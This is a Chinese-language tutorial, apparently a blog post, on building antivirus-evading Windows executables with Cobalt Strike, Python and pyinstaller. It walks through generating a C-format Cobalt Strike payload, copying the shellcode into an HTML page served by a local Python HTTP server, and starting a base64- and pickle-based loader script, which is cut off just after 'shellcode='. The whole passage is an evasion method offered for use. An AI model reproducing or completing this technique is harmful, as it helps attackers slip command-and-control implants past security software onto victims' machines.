pyinstaller+cs生成免杀exe过杀毒软件
简介:
之前学习免杀都是使用Metasploit自带的编码进行,从未成功过。也使用过GitHub上别人提供的免杀方法,最近学习并实践发现绕过国内的杀毒软件貌似并不难,本文使用手工分析特征码,使用base64编码绕过杀毒软件静态分析。虽然使用的方法比较简单,但对实际做免杀及免杀研究还是有一定意义的。
项目工具 :
CobaltStrike(CS)
python
pyinstaller
windows7
通过cs免杀:
生成payload
生成C语言的payload
生成之后是一个payload.c的文件 把这个文件里面的unsigned char buf[] = 后面双引号里面的都复制一下 新创建一个文件夹(在这里我创建的是shellcode )在这个文件夹里面创建一个html网页(a.html) 把payload.c里面复制的放在这个a.html网页里面 在本文件夹通过python启动一个http服务
python -m http.server 8080
访问查看是否开启http服务 服务已经打开
#generate.py
import pickle
import base64
shellcode=